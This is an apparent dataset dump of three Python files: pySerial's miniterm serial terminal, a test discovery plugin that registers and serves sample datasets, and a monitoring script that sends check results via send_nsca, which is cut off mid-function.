source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
miniterm.py
|
#!/usr/bin/python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
test_discovery.py
|
import asyncio
from http.server import HTTPServer, SimpleHTTPRequestHandler
import logging
import os
import shutil
import threading
from datamart_core import Discoverer
from datamart_core.common import setup_logging
logger = logging.getLogger(__name__)
class TestDiscoverer(Discoverer):
"""Discovery plugin for the test suite.
"""
def discover_datasets(self):
# Put this one on disk
with open('geo.csv', 'rb') as src:
with self.write_to_shared_storage('geo') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
# Omit name, should be set to 'geo' automatically
'description': "Another simple <em>CSV</em> with places",
'source': 'remi',
},
dataset_id='geo',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/geo_wkt.csv'),
{
'name': 'geo_wkt',
'description': "Simple CSV in <a href=\"https://en.wikipedia.o"
+ "rg/wiki/Well-known_text_representation_of_ge"
+ "ometry\">WKT</a> format",
'source': 'remi',
},
dataset_id='geo_wkt',
)
# Put this one on disk
with open('agg.csv', 'rb') as src:
with self.write_to_shared_storage('agg') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
# Omit name, should be set to 'agg' automatically
'description': "Simple CSV with ids and salaries to test "
+ "aggregation for numerical attributes",
'source': 'fernando',
},
dataset_id='agg',
)
# Put this one on disk
with open('lazo.csv', 'rb') as src:
with self.write_to_shared_storage('lazo') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
# Omit name, should be set to 'lazo' automatically
'description': "Simple CSV with states and years"
" to test the Lazo index service",
'source': 'fernando',
},
dataset_id='lazo',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/empty.csv'),
{
# Omit name, should be set to 'empty' automatically
'description': "A CSV with no rows to test alternate index",
'source': 'remi',
},
dataset_id='empty',
)
# Put this one on disk
with open('daily.csv', 'rb') as src:
with self.write_to_shared_storage('daily') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
'name': 'daily',
'description': "Temporal dataset with daily resolution",
'source': 'remi',
},
dataset_id='daily',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/hourly.csv'),
{
# Omit name, should be set to 'hourly' automatically
'description': "Temporal dataset with hourly resolution",
'source': 'remi',
},
dataset_id='hourly',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/invalid.bin'),
{
'name': 'Invalid, binary',
'description': "Some binary data that can't be parsed",
'source': 'remi',
},
dataset_id='invalid',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/dates_pivoted.csv'),
{
'name': 'dates pivoted',
'description': "Temporal dataset but in columns",
'source': 'remi',
},
dataset_id='dates_pivoted',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/years_pivoted.csv'),
{
'name': 'years pivoted',
'description': "Temporal dataset but in columns",
'source': 'remi',
},
dataset_id='years_pivoted',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/spss.sav'),
{
# Omit name, should be set to 'spss' automatically
'description': "SPSS format test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/SPSS',
},
dataset_id='spss',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/excel.xlsx'),
{
# Omit name, should be set to 'excel' automatically
'description': "Excel format 2007 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Microsoft_Excel',
},
dataset_id='excel',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/excel97.xls'),
{
# Omit name, should be set to 'excel97' automatically
'description': "Excel format 1997 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Microsoft_Excel',
},
dataset_id='excel97',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/stata114.dta'),
{
# Omit name, should be set to 'stata114' automatically
'description': "Stata format 114 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Stata',
},
dataset_id='stata114',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/stata118.dta'),
{
# Omit name, should be set to 'stata118' automatically
'description': "Stata format 118 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Stata',
},
dataset_id='stata118',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/basic.csv'),
{
'name': "basic",
'description': "This is a very simple CSV with people",
'source': 'remi',
},
dataset_id='basic',
)
def server():
with HTTPServer(('0.0.0.0', 8080), SimpleHTTPRequestHandler) as httpd:
httpd.serve_forever()
if __name__ == '__main__':
setup_logging()
os.chdir('tests/data')
# Start a web server
server_thread = threading.Thread(target=server)
server_thread.setDaemon(True)
server_thread.start()
fut = asyncio.ensure_future(
TestDiscoverer('datamart.test').run()
)
asyncio.get_event_loop().run_forever()
|
monitoring-report.py
|
#!/usr/bin/python3
from multiprocessing import Process
import subprocess as sp
import socket
import sys
import argparse
import os
import pwd
import grp
nscaConfig = ""
sendNscaPath = "/usr/sbin/send_nsca"
def dropPivileges(uid_name, gid_name=None):
if not gid_name:
gid_name = "nogroup"
target_uid = pwd.getpwnam(uid_name).pw_uid
target_gid = grp.getgrnam(gid_name).gr_gid
os.setgid(target_gid)
os.setuid(target_uid)
def splitCMD(cmd):
return list(filter(lambda a: a,cmd.strip("\n").split(" ")))
def executeAndSubmit(user, serviceName, cmd, noSudo):
if not noSudo:
dropPivileges(user)
message = ""
cmd = splitCMD(cmd)
# run monitoring command
try:
subP = sp.run(cmd, stdout=sp.PIPE, stderr=sp.PIPE)
message = "{}\t{}\t{}\t{}\n".format(hostname, serviceName, subP.returncode,
subP.stdout.decode("utf-8"))
except FileNotFoundError:
print("{} command not found!".format(splitCMD(cmd)[0]),file=sys.stderr)
# submitt the results
if nscaConfig:
nscaCMD = [sendNscaPath,'-c', nscaConfig]
else:
nscaCMD = [sendNscaPath]
p = sp.Popen(nscaCMD, stdout=sp.PIPE, stdin=sp.PIPE, stderr=sp.PIPE)
stdout = p.communicate(input=bytes(message,"utf-8"))
if p.returncode != 0:
